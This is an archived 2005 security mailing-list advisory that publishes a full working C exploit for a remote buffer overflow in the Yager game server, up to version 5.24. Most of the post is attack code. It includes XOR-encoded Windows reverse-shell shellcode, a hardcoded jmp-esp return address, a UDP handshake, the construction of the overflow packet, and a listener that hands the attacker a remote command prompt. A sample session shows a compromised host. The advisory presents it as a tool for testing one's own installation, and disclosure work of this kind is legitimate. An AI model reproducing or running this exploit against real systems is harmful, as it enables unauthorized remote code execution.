[EXPL] Yager Buffer Overflow (Exploit)

• Previous message: SecuriTeam: "[EXPL] E-Cart index.cgi Command Execution (Exploit)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 26 Apr 2005 10:48:40 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Yager Buffer Overflow (Exploit)
------------------------------------------------------------------------

SUMMARY

As we reported in our previous article:
<http://www.securiteam.com/windowsntfocus/5BP0J2KFGW.html> Yager Multiple
Vulnerabilities (Multiple Buffer Overflows and DoS), a vulnerability in
Yager allows remote attackers to cause the program to overflow an internal
buffer and in turn cause it to execute arbitrary code. The following
exploit can be used to test your Yager installation for the mentioned
vulnerability.

DETAILS

Vulnerable Systems:
 * Yager version 5.24 and prior

Exploit:
/*
 *
 * Yager <= 5.24 Remote Buffer Overflow Exploit
 *
 * cybertronic[at]gmx[dot]net
 * 04/25/2005
 *
 * send all the money to Luigi Auriemma
 * __ __ _
 * _______ __/ /_ ___ _____/ /__________ ____ (_)____
 * / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
 * / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
 * \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
 * /____/
 *
 * --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
 * --[ select target
 * --[ 0 [0xdeadc0de] crash server
 * --[ 1 [0x300686bd] binkw32.dll ver: 1.5.11.0 [ Working on WinXP Pro SP1
GER]
 * >> 1
 * --[ sending handshake [UDP]...done!
 * --[ reading server response [UDP]...done!
 * --[ server port: 1089
 * --[ connecting to 192.168.2.100:1089 [TCP]...done!
 * --[ exploiting WinXP Pro SP1 GER
 * --[ ret: 0x300686bd [ jmp esp in binkw32.dll ]
 * --[ exploiting packet overflow...
 * --[ sending packet...done!
 * --[ starting reverse handler [port: 1337]...done!
 * --[ incomming connection from: 192.168.2.100
 * --[ b0x pwned - h4ve phun
 * Microsoft Windows XP [Version 5.1.2600]
 * (C) Copyright 1985-2001 Microsoft Corp.
 *
 * C:\Yager>
 *
 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT_UDP 34855

#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"

/*
 *
 * prototypes
 *
 */

int exploit ( int s, unsigned long xoredip, unsigned short xoredcbport,
unsigned long ret );
int isip ( char *ip );
int send_handshake ( int s, struct sockaddr_in remote_addr );
int shell ( int s, char* tip, unsigned short cbport );

void header ();
void start_reverse_handler ( char* argv3 );

/*********************
 * Windows Shellcode *
 *********************/

/*
 * Type : connect back shellcode
 * Length: 316 bytes
 * CBIP : reverseshell[111] ( ^ 0x99999999 )
 * CBPort: reverseshell[118] ( ^ 0x9999 )
 *
 */

unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";

/*
 *
 * structures
 *
 */

struct targets {
        int num;
        unsigned long ret;
        char name[64];
}
target[]= {
        { 0, 0xdeadc0de, "crash server" },
        { 1, 0x300686bd, "binkw32.dll ver: 1.5.11.0 [ Working on WinXP Pro
SP1 GER]" } //push esp in binkw32.dll
};

/*
 *
 * functions
 *
 */

int
exploit ( int s, unsigned long xoredcbip, unsigned short xoredcbport,
unsigned long ret )
{
        int r;
        char buffer_pack[592];
        
        printf ( "--[ exploiting WinXP Pro SP1 GER\n" );
        printf ( "--[ ret: 0x%08x [ jmp esp in binkw32.dll ]\n", ret );

        memcpy ( &reverseshell[111], &xoredcbip, 4);
        memcpy ( &reverseshell[118], &xoredcbport, 2);

        r = ~time ( NULL ) & 0xffff;
        printf ( "--[ exploiting packet overflow...\n" );
        bzero ( &buffer_pack, sizeof ( buffer_pack ) );
        memset ( buffer_pack, 0x41, 268 );
        strncat ( buffer_pack, ( unsigned char* ) &ret, 4 );
        strncat ( buffer_pack, "\x41\x41\x41\x41", 4 ); //4 bytes padding
        memcpy ( buffer_pack + 276, reverseshell, sizeof ( reverseshell )
- 1 );
        buffer_pack[0] = 0x00;
        buffer_pack[1] = 0x00;
        buffer_pack[2] = 0x00;
        buffer_pack[3] = 0x00;
        buffer_pack[4] = 0x46; //sizeof ( buffer_pack ) - 0xa; 582d / 246h
        buffer_pack[5] = 0x02; //sizeof ( buffer_pack ) - 0xa; 582d / 246h
        buffer_pack[6] = ( r & 0x00ff );
        buffer_pack[7] = ( ( r & 0xff00 ) >> 8 );
        buffer_pack[8] = 0x00;
        buffer_pack[9] = 0x00;
        printf ( "--[ sending packet..." );
        if ( write ( s, buffer_pack, sizeof ( buffer_pack ) ) <= 0 )
        {
                printf ( "failed!\n" );
                return ( 1 );
        }
        printf ( "done!\n" );
        return ( 0 );
}

int
isip ( char *ip )
{
        int a, b, c, d;
        
        if ( !sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d ) )
                return ( 0 );
        if ( a < 1 )
                return ( 0 );
        if ( a > 255 )
                return 0;
        if ( b < 0 )
                return 0;
        if ( b > 255 )
                return 0;
        if ( c < 0 )
                return 0;
        if ( c > 255 )
                return 0;
        if ( d < 0 )
                return 0;
        if ( d > 255 )
                return 0;
        return 1;
}

int
send_handshake ( int s, struct sockaddr_in remote_addr )
{
        char* p;
        char crap[23];
        char in[2048];
        unsigned short port;
        
        bzero ( &crap, sizeof ( crap ) );
        crap[0] = 0x59;
        crap[1] = 0x5f;
        crap[2] = 0x4e;
        crap[3] = 0x45;
        crap[4] = 0x54;
        crap[5] = 0x5f;
        crap[6] = 0x59;
        crap[7] = 0x41;
        crap[8] = 0x47;
        crap[9] = 0x45;
        crap[10] = 0x52;
        crap[11] = 0x5f;
        crap[12] = 0x43;
        crap[13] = 0x4c;
        crap[14] = 0x49;
        crap[15] = 0x45;
        crap[16] = 0x4e;
        crap[17] = 0x54;
        crap[18] = 0x00;
        *( u_short* ) ( crap + 19 ) = ~time ( NULL );
        crap[21] = 0x00;
        crap[22] = 0x00;
        printf ( "--[ sending handshake [UDP]..." );
        if ( sendto ( s, crap, sizeof ( crap ), 0, ( struct sockaddr* )
&remote_addr, sizeof ( remote_addr ) ) < 0 )
        {
                printf ( "failed!\n" );
                return ( 1 );
        }
        printf ( "done!\n" );
        printf ( "--[ reading server response [UDP]..." );
        bzero ( &in, sizeof ( in ) );
        if ( recvfrom ( s, in, sizeof ( in ) -1, 0, NULL, NULL ) < 0 )
        {
                printf ( "failed!\n" );
                return ( 1 );
        }
        printf ( "done!\n" );
        p = in + 19;
        port = ntohs ( *( u_short * ) p );
        printf ( "--[ server port: %d\n", port );
        return ( port );
}

int
shell ( int s, char* tip, unsigned short cbport )
{
        int n;
        char buffer[2048];
        fd_set fd_read;

        printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p"
YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW
"4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n"
NORMAL "\n" );

        FD_ZERO ( &fd_read );
        FD_SET ( s, &fd_read );
        FD_SET ( 0, &fd_read );

        while ( 1 )
        {
                FD_SET ( s, &fd_read );
                FD_SET ( 0, &fd_read );

                if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
                        break;
                if ( FD_ISSET ( s, &fd_read ) )
                {
                        if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0
) ) < 0 )
                        {
                                printf ( "bye bye...\n" );
                                return;
                        }
                        if ( write ( 1, buffer, n ) < 0 )
                        {
                                printf ( "bye bye...\n" );
                                return;
                        }
                }
                if ( FD_ISSET ( 0, &fd_read ) )
                {
                        if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) )
< 0 )
                        {
                                printf ( "bye bye...\n" );
                                return;
                        }
                        if ( send ( s, buffer, n, 0 ) < 0 )
                        {
                                printf ( "bye bye...\n" );
                                return;
                        }
                }
                usleep(10);
        }
}

void
header ()
{
        printf ( " __ __ _ \n" );
        printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n"
);
        printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ /
___/ \n" );
        printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n"
);
        printf ( "\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/
/_/_/\\___/ \n" );
        printf ( " /____/ \n\n" );
        printf ( "--[ exploit by : cybertronic -
cybertronic[at]gmx[dot]net\n" );
}

void
start_reverse_handler ( char* argv3 )
{
        int s1, s2;
        unsigned short cbport;
        struct sockaddr_in cliaddr, servaddr;
        socklen_t clilen = sizeof ( cliaddr );

        sscanf ( argv3, "%u", &cbport );
        
        bzero ( &servaddr, sizeof ( servaddr ) );
        servaddr.sin_family = AF_INET;
        servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
        servaddr.sin_port = htons ( cbport );

        printf ( "--[ starting reverse handler [port: %u]...", cbport );
        if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
        {
                printf ( "socket failed!\n" );
                exit ( 1 );
        }
        bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
        if ( listen ( s1, 1 ) == -1 )
        {
                printf ( "listen failed!\n" );
                exit ( 1 );
        }
        printf ( "done!\n" );
        if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen )
) < 0 )
        {
                printf ( "accept failed!\n" );
                exit ( 1 );
        }
        close ( s1 );
        printf ( "--[ incomming connection from:\t%s\n", inet_ntoa (
cliaddr.sin_addr ) );
        shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
        close ( s2 );
}

int
main ( int argc, char* argv[] )
{
        int s1, s2, targ, i;
        unsigned long xoredcbip;
        unsigned short cbport, xoredcbport, port;
        struct sockaddr_in remote_addr;
        struct hostent* host_addr;

        if ( argc != 4 )
        {
                printf ( "Usage: %s <ip> <cbip> <cbport>\n", argv[0] );
                exit ( 1 );
        }
        system ( "clear" );
        header ();
        if ( !isip ( argv[1] ) )
        {
                printf ( "Invalid Target IP!\n" );
                exit ( 1 );
        }
        if ( !isip ( argv[2] ) )
        {
                printf ( "Invalid connect back IP!\n" );
                exit ( 1 );
        }
        printf("--[ select target\n");
        for ( i = 0; i < 2; i++ )
                printf ( "--[ %d [0x%08x] %s\n", target[i].num,
target[i].ret, target[i].name );
        printf ( " >> " );
        scanf ( "%d", &targ );
        if ( targ != 0 )
                if ( targ != 1 )
                {
                        printf ( "--[ invalid target!\n" );
                        exit ( 1 );
                }
        if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
        {
                fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] );
                exit ( 1 );
        }
        remote_addr.sin_family = AF_INET;
        remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr
);
        remote_addr.sin_port = htons ( PORT_UDP );
        if ( ( s1 = socket ( AF_INET, SOCK_DGRAM, IPPROTO_UDP ) ) < 0 )
    {
                printf ( "socket failed!\n" );
                exit ( 1 );
        }
        if ( ( port = send_handshake ( s1, remote_addr ) ) == 1 )
        {
                printf ( "handshake FAILED!\n" );
                exit ( 1 );
        }
        close ( s1 );
        if ( ( s2 = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
    {
                printf ( "socket failed!\n" );
                exit ( 1 );
        }
        printf ( "--[ connecting to %s:%u [TCP]...", argv[1], port );
        remote_addr.sin_port = htons ( port );
        if ( connect ( s2, ( struct sockaddr * ) &remote_addr, sizeof (
struct sockaddr ) ) == -1 )
        {
                printf ( "failed!\n" );
                exit ( 1 );
        }
        printf ( "done!\n" );
        
        xoredcbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
        xoredcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short )
0x9999;

        if ( exploit ( s2, xoredcbip, xoredcbport, target[targ].ret ) == 1
)
        {
                printf ( "exploitation FAILED!\n" );
                exit ( 1 );
        }
        close ( s2 );
        start_reverse_handler ( argv[3] );
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:cybertronic@gmx.net>
cybertronic.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[EXPL] E-Cart index.cgi Command Execution (Exploit)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages [NEWS] Ventrilo Denial of Service ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Lack of proper packet handling within Ventrilo allow attackers to crash ... void ventrilo_udp_head_dec(unsigned char *data) ... void ventrilo_udp_data_dec(unsigned char *data, int len, unsigned short ... (Securiteam) [EXPL] qwik-smtpd Format String ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... ** The second problem was "fixed" using another char and then ... ** calling the int 0x80 syscall. ... void Usage; ... (Securiteam) [EXPL] mtFTPd Server Format String (Exploit) ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... / discovered by darkeagle - xx.10.04 ... build_un(unsigned int retaddr, unsigned int offset, unsigned int base, ... main(int argc, char * argv) ... (Securiteam) [EXPL] Samba "send_mailslot()" Buffer Overflow Vulnerability (Exploit) ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... void put_name(char *dest, const char *name, int pad, unsigned int ... (Securiteam) [EXPL] Crystal FTP Pro Client LIST Proof of Concept ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... unsigned char reverseshell[] = ... void auth; ... void handle_cmd (int s, int connfd, char* ip); ... (Securiteam)